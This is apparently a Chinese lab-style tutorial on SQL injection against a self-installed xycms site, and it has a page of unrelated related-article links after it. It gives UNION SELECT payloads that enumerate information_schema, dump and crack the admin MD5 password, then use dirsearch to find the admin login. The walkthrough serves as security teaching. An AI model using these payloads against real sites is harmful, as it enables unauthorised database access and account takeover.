xycms搭建过程省略.....

首页界面

在网站查找注入点，也就是可能会和数据库有交互的地方，?id=13可知此处可能与数据库有交互，之后在此处进行测试

测试

1 and 1=1  1 and 1=2 //int型注入

1’ and 1=1#    1’ and 1=2# //char型注入

可知为int型注入，char型就不进行测试了

order by 列数 //查看数据的列数，常用二分法

order by 10 //正常显示  order by 11 //不正常显示

所以得知是10列，

id=13 and 1=2 union select 1,2,3,4,5,6,7,8,9,10 //联合查询，后面的数字有跟前上一步结果输入

这时会有数字显示在页面上，这些都是注入点，根据回显情况我们可以让我们想要的数据回显在页面上，

这里我选择数字10这个位置

id=13 and 1=2 union select 1,2,3,4,5,6,7,8,9,database() //查看当前数据库为xycms

and 1=2 union select 1,2,3,4,5,6,7,8,9,table_name from information_schema.tables where table_schema='xycms' //获取表名

and 1=2 union select 1,2,3,4,5,6,7,8,9,table_name from information_schema.tables where table_schema='xycms' limit 1,1 //获取第二张表名

一个数据库肯定不止一张表 limit 2,1 //表3  limit 3,1  //表4......以此类推

and 1=2 union select 1,2,3,4,5,6,7,8,9,column_name from information_schema.columns where table_name='common' limit 0,1    //获取表common列名1

同样的不止一张表  limit 1,1 （列2 ）.....

and 1=2 union select 1,2,3,4,5,6,7,8,9,id from common //获取ID信息

同样不止一个ID，可以加limit

通过以上的方法一个一个查询可以找到表为manage_user下有列名为m_name和m_pwd

and 1=2 union select 1,2,3,4,5,6,7,8,9,concat(m_name,'---',m_pwd) from manage_user

//查找用户名和密码（同样也不止一组）

admin111---24FBF59E4D9CC107F6CD64838EF63F98

密码是md5加密，在线md5加解密

admin111---qazxsw111

我们已经拿到账号密码，现在就是找后台登录界面

敏感目录扫描工具：dirsearch(百度网盘下载，提取码：bmxx)

环境：python

工具下载完成后，找到目录并在当前目录下打开cmd，

python dirsearch.py -u "扫描的url地址" -e *

python dirsearch.py -u "http://www.cjl.xycms.com/" -e *   //扫描敏感目录

主要看状态码为200的，状态码200为访问成功，看到一些比较像登录后台系统的文件目录，都尝试访问一下

最后通过system这个目录登录

输入刚刚获得的账号密码admin111---qazxsw111，登录成功。

xycms登录后台详细教程(php+mysql)相关推荐

1. Discuz!x3.4 QQ互联跳过完善资料直接登录（详细教程方法）

   Discuz!x3.4 QQ互联跳过完善资料直接登录(详细教程方法) 有很多人都为QQ互联的问题困扰,最近我正在研究QQ登录怎么才能避开完善信息直接登录的问题,结果经过几天的反复测验终于被我找到了方法 ...

2. Linux查看和剔除当前登录用户详细教程

   Linux查看和删除当前登录用户详细教程 文章目录: 一.`w`命令查看登录用户正在使用的进程信息 二.`who`命令查看当前正在登陆的用户 三.`last`查看登陆用户的历史信息 四.`pkill` ...

3. 青龙面板最新版本2.10.11+(诺兰短信登录)nvjdc详细教程

   懒人上车链接:点击这里上车 懒人验证码登录链接:点这里 青龙面板安装教程传送门:传送门 1:青龙面板自行安装(上面已经给出教程) 2:安装解压程序(一般服务器都已经安装了,提示找不到命令可以安装) y ...

4. PHP app登录qq,APP配置QQ登录的详细教程

   之前教程不够详细,很多人的APP不能正常使用QQ登录.现在重新整理了一个教程.大家可以参考配置. 为了避免重复注册帐号,安卓APP只能共用网站的QQ登录接口,这就需要你得重新为他申请APP的相关登录接 ...

5. 2023年微信小程序获取手机号授权登录注册详细教程，包含服务端教程

   前言 小程序中有很多地方都会用到用户的手机号,比如登陆注册,填写收货地址等等.有了这个组件可以快速获取微信绑定手机号码,无须用户填写. 网上大多数教程还是往年的,而微信官方的api已做了修改.本篇文章 ...

6. linux更换文件夹底色,ubuntu18.04系统修改登录背景详细教程

   如下图,这是一个macOS风格的登录背景,还带虚化效果的.我们将在本文详细讲解在ubuntu18.04系统中修改登录背景的方法. 安装帮助原文(英文,下载包请看下面的中文注解): Descriptio ...

7. Windows Server 2012开启远程桌面服务及授权多终端用户同时登录的详细教程

   一.前言 本教程适用于Windows Server 2012 R2系统版本: 本教程适用的情景为:需要对服务器开启长期.稳定.且不限制连接数的远程功能,即多用户.多终端可以同时远程登录到这一台服务器中 ...

8. 微信扫码登录超详细教程

   一.OAuth2 1.OAuth2介绍 2.OAuth2解决什么问题 (1)OAuth2提出的背景   照片拥有者想要在云冲印服务上打印照片,云冲印服务需要访问云存储服务上的资源.(2)图例   资源 ...

9. QQ第三方登录的详细教程

   这次说一下我自己第一次使用QQ第三方登录的过程 1 .我们开始需要在开发者网站上注册,http://open.qq.com/ 进入这个网站后点应用接入中的应用接入(因为那个按不动),开始注册,这个注册 ...

最新文章

1. scala可变长度参数函数
2. SAP QM 在Quality Notification里维护Internal Note
3. 【已解决】mysql连接出错：ERROR 1040 (HY000): Too many connections
4. java 垃圾回收 指针_Java 和 C++ 垃圾回收之间的差别
5. 迁移学习领域自适应：具有类间差异的联合概率最大平均差异
6. 2015-03-18 current note update logic in my task
7. .NET CORE(C#) WPF亚克力窗体
8. 同事用Excel花了半小时做甘特图，我用一工具只用10分钟
9. gpt分区安装的Win7激活工具
10. 网吧服务器磁盘性能,网吧游戏服务端显示磁盘已满怎么解决
11. 打开word出现自动化automation错误、Microsoft visual basic 运行时错误
12. matlab 创建批量文件夹_如何在Mac上为照片加水印？水印照片怎样批量处理？
13. 日志数据如何同步到MaxCompute
14. 9个最佳的大数据处理编程语言
15. 孙宇晨：90后的倔强
16. 【Mac 环境配置】--安装git及使用
17. Ubuntu 16.04 android 5.1编译错误
18. 手把手教你打印出PDF（fpdf的简单应用）
19. 假若重新度过大学四年。。
20. 数据结构的那些“事”

热门文章

1. 推荐几个网址 -by jhy
2. 太优秀了！28岁任北大博导的没美腻妹子，再获科学大奖！
3. 北斗形变监测系统_桥梁北斗形变监测 核心为HCMONITOR
4. 高斯计如何用于生物医学研究
5. 拼团小程序服务器配置,拼团小程序的拼团活动怎么设置？
6. SQL Server存储机制
7. python3多线程传参_python多线程 怎么传送多个参数
8. 不同业务场景Cas客户端(Java业务系统)接入
9. wfilters小波滤波器
10. 《地理信息系统导论》chapter 18 GIS模型与建模